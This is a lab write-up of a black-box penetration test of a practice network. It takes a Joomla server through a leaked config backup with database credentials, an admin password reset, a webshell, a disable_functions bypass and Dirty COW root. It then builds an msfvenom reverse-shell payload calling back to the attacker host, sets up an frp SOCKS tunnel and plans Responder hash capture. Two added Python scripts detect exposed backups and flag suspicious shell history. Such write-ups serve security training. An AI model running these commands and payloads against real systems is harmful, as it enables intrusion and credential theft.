# Environment setup

Topology diagram

# Adding a network adapter

Add one network adapter and leave everything else unchanged.

# Notes

  • Don't reboot any of the targets; some services aren't set to auto-start
  • web-centos needs its network interface restarted

This round is a black-box test: no account credentials are provided.

Damn, it starts messing with me the moment I get in: don't click that VM Tools prompt, click it and the box is toast.

Also, the stupid Windows box auto-locks the screen; change that setting.

# Initial access from the external network

web-centos: 172.29.31.135

# Host scan

nmap scan:

```shell
nmap -sS -sV -Pn -T4 172.29.31.135
```

From the result we can see:

  • port 22 is an SSH service
  • port 80 is an nginx proxy
  • port 3306 is a MySQL service

So let's visit 172.29.31.125 and see what's being proxied.

It's a Joomla site.

# Directory scan

Run dirsearch against it; it turns up a lot of things.

```text
┌──(miku㉿DESKTOP-G5UPSLJ)-[/mnt/e/soft/dirsearch-master]
└─$ ./dirsearch.py -u http://172.29.31.135/
  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /mnt/e/soft/dirsearch-master/reports/172.29.31.135/-_22-09-05_10-07-24.txt
Error Log: /mnt/e/soft/dirsearch-master/logs/errors-22-09-05_10-07-24.log
Target: http://172.29.31.135/
[10:07:24] Starting: 
[10:07:25] 403 -  278B  - /.configuration.php.swp
[10:07:26] 403 -  278B  - /.ht_wsr.txt
[10:07:26] 403 -  278B  - /.htaccess.bak1
[10:07:26] 403 -  278B  - /.htaccess.orig
[10:07:26] 403 -  278B  - /.htaccess.sample
[10:07:26] 403 -  278B  - /.htaccess.save
[10:07:26] 403 -  278B  - /.htaccess_extra
[10:07:26] 403 -  278B  - /.htaccess_orig
[10:07:26] 403 -  278B  - /.htaccess_sc
[10:07:26] 403 -  278B  - /.htaccessOLD
[10:07:26] 403 -  278B  - /.htaccessOLD2
[10:07:26] 403 -  278B  - /.htaccessBAK
[10:07:26] 403 -  278B  - /.htm
[10:07:26] 403 -  278B  - /.html
[10:07:26] 403 -  278B  - /.htpasswd_test
[10:07:26] 403 -  278B  - /.htpasswds
[10:07:26] 403 -  278B  - /.httr-oauth
[10:07:26] 403 -  278B  - /.php
[10:07:27] 200 -    0B  - /2.php
[10:07:28] 200 -   92KB - /1.php
[10:07:29] 200 -   18KB - /LICENSE.txt
[10:07:29] 200 -    5KB - /README.txt
[10:07:33] 301 -  322B  - /administrator  ->  http://172.29.31.135/administrator/
[10:07:33] 403 -  278B  - /administrator/.htaccess
[10:07:33] 301 -  327B  - /administrator/logs  ->  http://172.29.31.135/administrator/logs/
[10:07:33] 200 -   31B  - /administrator/cache/
[10:07:33] 200 -   31B  - /administrator/logs/
[10:07:33] 200 -    2KB - /administrator/includes/
[10:07:35] 200 -    5KB - /administrator/
[10:07:35] 200 -    5KB - /administrator/index.php
[10:07:35] 301 -  312B  - /bin  ->  http://172.29.31.135/bin/
[10:07:35] 200 -   31B  - /bin/
[10:07:35] 200 -   31B  - /cache/
[10:07:35] 301 -  314B  - /cache  ->  http://172.29.31.135/cache/
[10:07:36] 200 -   31B  - /cli/
[10:07:36] 200 -   31B  - /components/
[10:07:36] 301 -  319B  - /components  ->  http://172.29.31.135/components/
[10:07:36] 200 -    0B  - /configuration.php
[10:07:36] 200 -    2KB - /configuration.php~
[10:07:39] 200 -    3KB - /htaccess.txt
[10:07:40] 301 -  315B  - /images  ->  http://172.29.31.135/images/
[10:07:40] 200 -   31B  - /images/
[10:07:40] 301 -  317B  - /includes  ->  http://172.29.31.135/includes/
[10:07:40] 200 -   31B  - /includes/
[10:07:41] 200 -   16KB - /index.php
[10:07:41] 301 -  317B  - /language  ->  http://172.29.31.135/language/
[10:07:41] 200 -   31B  - /layouts/
[10:07:41] 301 -  318B  - /libraries  ->  http://172.29.31.135/libraries/
[10:07:41] 200 -   31B  - /libraries/
[10:07:41] 200 -    9KB - /index.php/login/
[10:07:42] 200 -   31B  - /media/
[10:07:42] 301 -  314B  - /media  ->  http://172.29.31.135/media/
[10:07:43] 301 -  316B  - /modules  ->  http://172.29.31.135/modules/
[10:07:43] 200 -   31B  - /modules/
[10:07:45] 301 -  316B  - /plugins  ->  http://172.29.31.135/plugins/
[10:07:45] 200 -   31B  - /plugins/
[10:07:46] 200 -  829B  - /robots.txt
[10:07:47] 403 -  278B  - /server-status
[10:07:47] 403 -  278B  - /server-status/
[10:07:49] 301 -  318B  - /templates  ->  http://172.29.31.135/templates/
[10:07:49] 200 -   31B  - /templates/index.html
[10:07:49] 200 -   31B  - /templates/
[10:07:49] 200 -    0B  - /templates/system/
[10:07:49] 200 -    0B  - /templates/beez3/
[10:07:49] 200 -    0B  - /templates/protostar/
[10:07:49] 301 -  312B  - /tmp  ->  http://172.29.31.135/tmp/
[10:07:49] 200 -   31B  - /tmp/
[10:07:50] 200 -    2KB - /web.config.txt
Task Completed
```


# robots.txt


# /administrator

The admin login page; weak-password brute forcing got nowhere, so let's look at the rest.

# 1.php

1.php turns out to be a phpinfo page.

It shows the current absolute path, which is handy for writing a shell.

It also shows disable_functions, open_basedir and so on.

# /configuration.php~

View the source:

```php
<?php
class JConfig {
    public $offline = '0';
    public $offline_message = '网站正在维护。<br /> 请稍候访问。';
    public $display_offline_message = '1';
    public $offline_image = '';
    public $sitename = 'test';
    public $editor = 'tinymce';
    public $captcha = '0';
    public $list_limit = '20';
    public $access = '1';
    public $debug = '0';
    public $debug_lang = '0';
    public $debug_lang_const = '1';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'testuser';
    public $password = 'cvcvgjASD!@';
    public $db = 'joomla';
    public $dbprefix = 'am2zu_';
    public $live_site = '';
    public $secret = 'gXN9Wbpk7ef3A4Ys';
    public $gzip = '0';
    public $error_reporting = 'default';
    public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
    public $ftp_host = '';
    public $ftp_port = '';
    public $ftp_user = '';
    public $ftp_pass = '';
    public $ftp_root = '';
    public $ftp_enable = '0';
    public $offset = 'UTC';
    public $mailonline = '1';
    public $mailer = 'mail';
    public $mailfrom = 'test@test.com';
    public $fromname = 'test';
    public $sendmail = '/usr/sbin/sendmail';
    public $smtpauth = '0';
    public $smtpuser = '';
    public $smtppass = '';
    public $smtphost = 'localhost';
    public $smtpsecure = 'none';
    public $smtpport = '25';
    public $caching = '0';
    public $cache_handler = 'file';
    public $cachetime = '15';
    public $cache_platformprefix = '0';
    public $MetaDesc = '';
    public $MetaKeys = '';
    public $MetaTitle = '1';
    public $MetaAuthor = '1';
    public $MetaVersion = '0';
    public $robots = '';
    public $sef = '1';
    public $sef_rewrite = '0';
    public $sef_suffix = '0';
    public $unicodeslugs = '0';
    public $feed_limit = '10';
    public $feed_email = 'none';
    public $log_path = '/var/www/html/administrator/logs';
    public $tmp_path = '/var/www/html/tmp';
    public $lifetime = '15';
    public $session_handler = 'database';
    public $shared_session = '0';
}
```

This backup copy of the config contains the database connection details:

```php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'testuser';
public $password = 'cvcvgjASD!@';
public $db = 'joomla';
public $dbprefix = 'am2zu_';
```

Let's try logging in remotely.
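The defender's side of this finding, as an added example that is not from the original writeup: a small Python check that parses dirsearch report lines (the format shown above) and separates backup/temp artefacts the server actually served from those it refused, so a scan of your own web root can be swept for leaks like configuration.php~. The suffix list and the sample report text are constructed for the example.

```python
import re

# Suffixes that editors, deploy scripts and admins leave next to live files.
# Each entry is (regex on the URL path, label).
BACKUP_PATTERNS = [
    (r"~$", "editor backup copy (~)"),
    (r"\.(bak\d*|old|orig|save|sample|swp|tmp|copy)$", "backup/temp suffix"),
]

# dirsearch report line, as in the output above:
#   [10:07:36] 200 -    2KB - /configuration.php~
DIRSEARCH_LINE = re.compile(
    r"^\[\d\d:\d\d:\d\d\]\s+(?P<status>\d{3})\s+-\s+(?P<size>\S+)\s+-\s+(?P<path>\S+)"
)


def classify(path):
    """Label the path if it looks like a backup/temp artefact, else None."""
    for pattern, label in BACKUP_PATTERNS:
        if re.search(pattern, path):
            return label
    return None


def parse_dirsearch(report):
    """Parse dirsearch report text into (status, size, path) tuples; banner lines are skipped."""
    hits = []
    for line in report.splitlines():
        m = DIRSEARCH_LINE.match(line.strip())
        if m:
            hits.append((int(m["status"]), m["size"], m["path"]))
    return hits


def exposed_backups(hits):
    """Split backup artefacts into those the server served (2xx) and those it refused.

    A 2xx on a file like configuration.php~ means the raw source, credentials
    included, is readable by anyone; a 403 means the web server blocked it and
    the name only came from the wordlist.
    """
    served, refused = [], []
    for status, _size, path in hits:
        label = classify(path)
        if label is None:
            continue
        (served if 200 <= status < 300 else refused).append((path, label))
    return served, refused


# Constructed sample: a few lines in the same format as the report above.
SAMPLE_REPORT = """\
[10:07:25] 403 -  278B  - /.configuration.php.swp
[10:07:26] 403 -  278B  - /.htaccess.bak1
[10:07:36] 200 -    0B  - /configuration.php
[10:07:36] 200 -    2KB - /configuration.php~
[10:07:50] 200 -    2KB - /web.config.txt
"""

if __name__ == "__main__":
    served, refused = exposed_backups(parse_dirsearch(SAMPLE_REPORT))
    for path, label in served:
        print(f"EXPOSED  {path}  ({label})")
    for path, label in refused:
        print(f"blocked  {path}  ({label})")
```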

# Remote MySQL login

The remote connection works.

Now look around inside:

```text
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.003 sec)
MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| am2zu_action_log_config       |
| am2zu_action_logs             |
| am2zu_action_logs_extensions  |
| am2zu_action_logs_users       |
| am2zu_assets                  |
| am2zu_associations            |
| am2zu_banner_clients          |
| am2zu_banner_tracks           |
| am2zu_banners                 |
| am2zu_categories              |
| am2zu_contact_details         |
| am2zu_content                 |
| am2zu_content_frontpage       |
| am2zu_content_rating          |
| am2zu_content_types           |
| am2zu_contentitem_tag_map     |
| am2zu_core_log_searches       |
| am2zu_extensions              |
| am2zu_fields                  |
| am2zu_fields_categories       |
| am2zu_fields_groups           |
| am2zu_fields_values           |
| am2zu_finder_filters          |
| am2zu_finder_links            |
| am2zu_finder_links_terms0     |
| am2zu_finder_links_terms1     |
| am2zu_finder_links_terms2     |
| am2zu_finder_links_terms3     |
| am2zu_finder_links_terms4     |
| am2zu_finder_links_terms5     |
| am2zu_finder_links_terms6     |
| am2zu_finder_links_terms7     |
| am2zu_finder_links_terms8     |
| am2zu_finder_links_terms9     |
| am2zu_finder_links_termsa     |
| am2zu_finder_links_termsb     |
| am2zu_finder_links_termsc     |
| am2zu_finder_links_termsd     |
| am2zu_finder_links_termse     |
| am2zu_finder_links_termsf     |
| am2zu_finder_taxonomy         |
| am2zu_finder_taxonomy_map     |
| am2zu_finder_terms            |
| am2zu_finder_terms_common     |
| am2zu_finder_tokens           |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types            |
| am2zu_languages               |
| am2zu_menu                    |
| am2zu_menu_types              |
| am2zu_messages                |
| am2zu_messages_cfg            |
| am2zu_modules                 |
| am2zu_modules_menu            |
| am2zu_newsfeeds               |
| am2zu_overrider               |
| am2zu_postinstall_messages    |
| am2zu_privacy_consents        |
| am2zu_privacy_requests        |
| am2zu_redirect_links          |
| am2zu_schemas                 |
| am2zu_session                 |
| am2zu_tags                    |
| am2zu_template_styles         |
| am2zu_ucm_base                |
| am2zu_ucm_content             |
| am2zu_ucm_history             |
| am2zu_update_sites            |
| am2zu_update_sites_extensions |
| am2zu_updates                 |
| am2zu_user_keys               |
| am2zu_user_notes              |
| am2zu_user_profiles           |
| am2zu_user_usergroup_map      |
| am2zu_usergroups              |
| am2zu_users                   |
| am2zu_utf8_conversion         |
| am2zu_viewlevels              |
| umnbt_action_log_config       |
| umnbt_action_logs             |
| umnbt_action_logs_extensions  |
| umnbt_action_logs_users       |
| umnbt_assets                  |
| umnbt_associations            |
| umnbt_banner_clients          |
| umnbt_banner_tracks           |
| umnbt_banners                 |
| umnbt_categories              |
| umnbt_contact_details         |
| umnbt_content                 |
| umnbt_content_frontpage       |
| umnbt_content_rating          |
| umnbt_content_types           |
| umnbt_contentitem_tag_map     |
| umnbt_core_log_searches       |
| umnbt_extensions              |
| umnbt_fields                  |
| umnbt_fields_categories       |
| umnbt_fields_groups           |
| umnbt_fields_values           |
| umnbt_finder_filters          |
| umnbt_finder_links            |
| umnbt_finder_links_terms0     |
| umnbt_finder_links_terms1     |
| umnbt_finder_links_terms2     |
| umnbt_finder_links_terms3     |
| umnbt_finder_links_terms4     |
| umnbt_finder_links_terms5     |
| umnbt_finder_links_terms6     |
| umnbt_finder_links_terms7     |
| umnbt_finder_links_terms8     |
| umnbt_finder_links_terms9     |
| umnbt_finder_links_termsa     |
| umnbt_finder_links_termsb     |
| umnbt_finder_links_termsc     |
| umnbt_finder_links_termsd     |
| umnbt_finder_links_termse     |
| umnbt_finder_links_termsf     |
| umnbt_finder_taxonomy         |
| umnbt_finder_taxonomy_map     |
| umnbt_finder_terms            |
| umnbt_finder_terms_common     |
| umnbt_finder_tokens           |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types            |
| umnbt_languages               |
| umnbt_menu                    |
| umnbt_menu_types              |
| umnbt_messages                |
| umnbt_messages_cfg            |
| umnbt_modules                 |
| umnbt_modules_menu            |
| umnbt_newsfeeds               |
| umnbt_overrider               |
| umnbt_postinstall_messages    |
| umnbt_privacy_consents        |
| umnbt_privacy_requests        |
| umnbt_redirect_links          |
| umnbt_schemas                 |
| umnbt_session                 |
| umnbt_tags                    |
| umnbt_template_styles         |
| umnbt_ucm_base                |
| umnbt_ucm_content             |
| umnbt_ucm_history             |
| umnbt_update_sites            |
| umnbt_update_sites_extensions |
| umnbt_updates                 |
| umnbt_user_keys               |
| umnbt_user_notes              |
| umnbt_user_profiles           |
| umnbt_user_usergroup_map      |
| umnbt_usergroups              |
| umnbt_users                   |
| umnbt_utf8_conversion         |
| umnbt_viewlevels              |
+-------------------------------+
156 rows in set (0.003 sec)
```

From the config we saw earlier, the prefix of the tables Joomla actually uses is am2zu_.

Query the users table.

There's a Super User, but the password is stored hashed, so use UPDATE to replace it.

# Logging into the admin panel

Log into the admin panel with the password we just set.

Logged in.

Then go in to make changes.

Click Beez3 on the right.

Add a one-line webshell.

As for the path, our earlier scan turned up /templates/beez3/.

Visit it.

# Connecting with AntSword

It connects, but gets no response because of disable_functions.

Bypass that with this tool:

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

Upload the files.

Enter the corresponding paths:

```text
http://172.29.31.135/b.php?cmd=id&outpath=/tmp/123&&sopath=/tmp/bypass_disablefunc_x64.so
```

That's the first host done.

# Information gathering

# ifconfig

The IP here is not the one we scanned from outside, so these services are probably being forwarded by a single internet-facing host; the nginx service we saw earlier backs that up.

# Checking the forwarded traffic

Use netstat -naplt.

Common netstat options:

  • -a (all) show everything; by default LISTEN entries are not shown
  • -t (tcp) show only TCP
  • -u (udp) show only UDP
  • -n don't resolve names; show everything that can be numeric as numbers
  • -l list only sockets in the LISTEN state
  • -p show the program that owns each connection
  • -r show routing information (the routing table)
  • -e show extended information, e.g. uid
  • -s per-protocol statistics
  • -c re-run netstat at a fixed interval

192.168.93.100 is the host forwarding our traffic.

# fscan scan

Add the x (execute) permission.

Scan:

```shell
fscan -h 192.168.93.0/24
```

After it finishes, the results are in /var/www/html/result.txt:

```text
192.168.93.100:22 open
192.168.93.10:135 open
192.168.93.120:80 open
192.168.93.20:80 open
192.168.93.120:22 open
192.168.93.30:139 open
192.168.93.20:139 open
192.168.93.10:139 open
192.168.93.100:80 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.20:1433 open
192.168.93.30:445 open
192.168.93.20:445 open
192.168.93.10:445 open
192.168.93.120:3306 open
192.168.93.100:3306 open
[+] NetInfo:
[*]192.168.93.20
   [->]win2008
   [->]192.168.93.20
[*] WebTitle:http://192.168.93.20      code:404 len:315    title:Not Found
[+] NetInfo:
[*]192.168.93.10
   [->]WIN-8GA56TNV3MV
   [->]192.168.93.10
[*] 192.168.93.30        __MSBROWSE__\WIN7              Windows 7 Professional 7601 Service Pack 1
[+] NetInfo:
[*]192.168.93.30
   [->]win7
   [->]192.168.93.30
[*] 192.168.93.30  (Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.93.10        WORKGROUP\WIN-8GA56TNV3MV   Windows Server 2012 R2 Datacenter 9600
[*] 192.168.93.20        TEST\WIN2008           Windows Server (R) 2008 Datacenter 6003 Service Pack 2
[*] 192.168.93.20  (Windows Server (R) 2008 Datacenter 6003 Service Pack 2)
[*] WebTitle:http://192.168.93.120     code:200 len:16020  title:Home
[*] WebTitle:http://192.168.93.100     code:200 len:16020  title:Home
[+] mysql:192.168.93.120:3306:root 123
[+] mysql:192.168.93.100:3306:root 123
```

That gives us the following:

```text
[*] 192.168.93.30        __MSBROWSE__\WIN7              Windows 7 Professional 7601 Service Pack 1
[*] 192.168.93.20        TEST\WIN2008           Windows Server (R) 2008 Datacenter 6003 Service Pack 2
[*] 192.168.93.10        WORKGROUP\WIN-8GA56TNV3MV   Windows Server 2012 R2 Datacenter 9600
```


# Lateral movement

# web-centos

# ssh

Under the tmp directory there's a mysql directory.

```shell
adduser wwwuser
passwd wwwuser_123Aqx
```

These are the two Linux commands for creating a new user, and we saw earlier that this host has SSH running,

so let's try to connect.

Connected.

This is the internet-facing host.

# Information gathering 1

# System information

```text
[wwwuser@localhost ~]$ cat /etc/*-re*
CentOS release 6.5 (Final)
CentOS release 6.5 (Final)
CentOS release 6.5 (Final)
cpe:/o:centos:linux:6:GA
```

# Kernel version

```text
[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
```

An old kernel; try the Dirty COW vulnerability for privilege escalation.

# Dirty COW privilege escalation

https://github.com/firefart/dirtycow

The target has wget and gcc, so send the source over and compile it on the box.

Compile:

```shell
gcc -pthread dirty.c -o dirty -lcrypt
```

Enter the new password 123456.

Then check the root user in /etc/passwd.

We are root now.

# Getting a session in msf

To make management easier later on, also get a session in msf.

```shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.47.130 LPORT=4444 -f elf > mshell.elf
```

```text
use exploit/multi/handler  # the listener module
set payload linux/x64/meterpreter/reverse_tcp  # same payload as the implant
set lhost 192.168.47.130  # kali's ip
set lport 4444  # the implant's port
```

Session established.

# Information gathering 2

# Processes

No domain admin processes.

# The /root directory

There's an nginx here; this is the nginx that proxies the Joomla site.

Now look at .bash_history too:

```shell
[firefart@localhost ~]# cat .bash_history 
netstat -pantu
service iptables status 
chkconfig --list 
 chkconfig iptables off
chkconfig --list 
curl http://192.168.1.124/
service iptables stop
curl http://192.168.1.124/
ls
yum  -h
yum -y remove nginx
ls
yum -y install proc* openssl* pcre*
wget http://nginx.org/download/nginx-1.9.4.tar.gz
tar zxvf nginx-1.9.4.tar.gz
 cd nginx-1.9.4
 ./configure  --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-threads --with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'
$ make
$ make install
yum install -y gcc gcc-c++
$ make
sudo apt-get install build-essential
yum install -y gcc gcc-c++
yum install -y gcc 
gcc
yum install gcc
gcc
$ make
 ./configure  --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-threads --with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'
make
make install
ls
ps -ef
netstat -pantu
ls
cd man/
la
ls
cd //
cd ~
ls
cd nginx-1.9.4
ls
cd html/
ls
cd ..
ls
cd auto/
ls
cd ..
whereis nginx
cd /usr/sbin/nginx
/usr/sbin/nginx 
netstat -pantu
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
ls
cd /etc/nginx/
ls
cat ngnix.conf
;S
;s
ls
cat nginx.conf
ls
rm nginx.conf
mv ngnix.conf  nginx.conf
cd /usr/sbin/
nginx -c reload
nginx -s reload 
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
nginx -s reload 
ls
cd ~
ls
cd nginx-1.9.4
./configure  --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-threads --with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'
$ make
$ make install
cd /usr/sbin/
nginx -s reload 
ls
vi /etc/nginx/nginx.conf
nginx -s reload 
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
cd /usr/bin/
cd /usr/sbin/
nginx -s reload
vi /etc/nginx/nginx.conf
nginx -s reload
netstat -pantu
ls
cd root/
ls
ls -all
cat .bash_history
cd /home/
ls
cd wwwuser/
ls
ls -all
cd ~
ls
ls -all
vim .bash_history 
vi .bash_history 
ls
cd ..
ls
uname -a
adduser  wwwuser
passwd   wwwuser_123Aqx
passwd   wwwuser
su wwwuser
su wwwuser
ip
id
cp /tmp/passwd.bak  /etc/passwd
cat /etc/passwd
su root
yum install git
git clone https://github.com/FireFart/dirtycow.git
ls
ls -all
cd ..
git clone https://github.com/FireFart/dirtycow.git
su wwwuser
ip addr
ifconfig -a
ls
rm Responder-master
rm  -r -f  Responder-master
rm Responder-master.zip 
ls
cd  /etc/sysconfig/network-scripts/
ls
ip addr
cat ifcfg-eth1
cat ifcfg-eth0
cd ~
ls
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
/usr/nginx/sbin/nginx -s reload
/usr/sbin/nginx  -s reload
ip addr
cat /etc/passwd
passwd wwwuser
passwd root
ls
cd /home/
ls
ls -all
ls
git clone https://github.com/lgandx/Responder.git
ls
unzip Responder-master.zip 
yum install unzip
unzip Responder-master.zip 
ls
./Responder-master/
ls
cd Responder-master
ls
vim Responder.conf 
vi Responder.conf 
python Responder.py 
ifconfig
python    Responder.py   -I eth1 -r -d -v
python3    Responder.py   -I eth1 -r -d -v
python3    Responder.py   -I eth1
python    Responder.py   -I eth1
yum install python3
```

Note the Responder commands at the end.

A search turns up:

https://blog.csdn.net/wxh0000mm/article/details/105735032?ops_request_misc=%7B%22request%5Fid%22%3A%22166236407216782388043893%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&request_id=166236407216782388043893&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-105735032-null-null.142v46pc_rank_34_default_23&utm_term=Responder%E5%88%A9%E7%94%A8&spm=1018.2226.3001.4187

https://blog.csdn.net/wxh0000mm/article/details/105734843?ops_request_misc=%7B%22request%5Fid%22%3A%22166236407216782244826085%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fall.%22%7D&request_id=166236407216782244826085&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~pc_rank_34-4-105734843-null-null.142v46pc_rank_34_default_23&utm_term=Responder%E5%88%A9%E7%94%A8&spm=1018.2226.3001.4187

This technique needs a listener on the internal network and another Windows host that connects to it, which captures that host's hash; conveniently, we saw earlier that 192.168.93.20 has port 1433 open, so let's try to make use of that.
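As an added example (not part of the original writeup), a Python triage script for exactly this kind of recovered .bash_history: it tags account creation, firewall disabling, /etc/passwd replacement, kernel-exploit source, history editing and credential-capture tooling, so an incident responder reading the history gets the sequence of events at a glance. The rule set and the sample history (a subset of the lines above) are constructed here.

```python
import re

# Triage rules for a recovered shell history. Each is (compiled regex, tag);
# the command-word anchored ones only match when the command starts the entry.
RULES = [
    (re.compile(r"^(adduser|useradd)\s"), "account-created"),
    (re.compile(r"^passwd(\s|$)"), "password-changed"),
    (re.compile(r"^(service\s+iptables\s+stop|chkconfig\s+iptables\s+off)"), "firewall-disabled"),
    (re.compile(r"^cp\s+\S+\s+/etc/(passwd|shadow)\b"), "passwd-file-replaced"),
    (re.compile(r"dirtycow|dirty\.c\b", re.I), "kernel-exploit-source"),
    (re.compile(r"Responder\.(py|conf)"), "credential-capture-tool"),
    (re.compile(r"^(vi|vim|rm|sed)\s.*\.bash_history"), "history-tampering"),
    (re.compile(r"^git\s+clone\s+https?://"), "repo-cloned"),
]


def triage(history_text):
    """Return [(lineno, command, [tags])] for every history entry that trips a rule.

    Entries are stripped before matching: the history on this page has entries
    with leading spaces, which must not hide them from the anchored rules.
    """
    findings = []
    for lineno, raw in enumerate(history_text.splitlines(), 1):
        cmd = raw.strip()
        if not cmd:
            continue
        tags = [tag for rx, tag in RULES if rx.search(cmd)]
        if tags:
            findings.append((lineno, cmd, tags))
    return findings


def summarize(findings):
    """Count how often each tag fired, e.g. {'password-changed': 2, ...}."""
    counts = {}
    for _, _, tags in findings:
        for tag in tags:
            counts[tag] = counts.get(tag, 0) + 1
    return counts


def timeline(findings):
    """One line per finding, in history order (bash history has no timestamps, only order)."""
    return [f"#{n}: {', '.join(tags)}: {cmd}" for n, cmd, tags in findings]


# Constructed sample: a subset of the history recovered on this page.
SAMPLE_HISTORY = """\
netstat -pantu
service iptables status
 chkconfig iptables off
service iptables stop
yum -y remove nginx
adduser  wwwuser
passwd   wwwuser_123Aqx
passwd   wwwuser
cp /tmp/passwd.bak  /etc/passwd
git clone https://github.com/FireFart/dirtycow.git
vim .bash_history
python    Responder.py   -I eth1 -r -d -v
"""

if __name__ == "__main__":
    found = triage(SAMPLE_HISTORY)
    print("\n".join(timeline(found)))
    print(summarize(found))
```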

# win2008

# frp proxy

frps.ini

```ini
[common]
bind_port = 7000
```

frpc.ini

```ini
[common]
server_addr = 192.168.47.130
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 8989
plugin = socks5
```

Download it from kali with wget, as before.

Then start it in the background:

```shell
./frpc -c frpc.ini &
```

# nmap scan

Check the 1433 service on 192.168.93.20:

```text
┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -p 1433 192.168.93.20
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 04:10 EDT
Nmap scan report for 192.168.93.20
Host is up (0.00091s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
Nmap done: 1 IP address (1 host up) scanned in 3.44 seconds
```

It's open; now a more detailed scan:

```text
Nmap scan report for 192.168.93.20
Host is up (0.00076s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
